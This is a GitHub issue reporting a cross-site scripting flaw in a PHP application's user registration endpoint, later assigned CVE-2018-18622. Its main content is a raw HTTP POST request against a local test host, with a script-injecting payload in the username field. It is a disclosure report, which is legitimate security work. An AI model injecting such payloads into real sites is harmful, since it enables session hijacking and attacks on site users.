Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

there is a xss #8

Open
m3lon opened this issue Oct 23, 2018 · 1 comment
Open

there is a xss #8

m3lon opened this issue Oct 23, 2018 · 1 comment

Comments

@m3lon
Copy link

m3lon commented Oct 23, 2018

POST /w/index.php?m=public&a=doregister HTTP/1.1
Host: 192.168.66.128
Content-Length: 204
Cache-Control: max-age=0
Origin: http://192.168.66.128
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: http://192.168.66.128/w/index.php?m=public&a=register
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=kt5sd3ceatlifr5hrv4vtpn3h6
Connection: close

username=%3Cscript%3Ealert(document.domain)</script>&useremail=1140820932%40qq.com&userpass=123456&reuserpass=123456&verify=03247&hash=8fea33ca2fc275601dfd7539f1c4f559_0c683e5c5a4f93a943a4e955ea83e75f

2018-10-23 9 23 34

2018-10-23 9 24 34
@abergmann
Copy link

CVE-2018-18622 was assigned to this issue.

@m3lon m3lon closed this as completed Oct 24, 2018
@m3lon m3lon reopened this Oct 25, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@abergmann @m3lon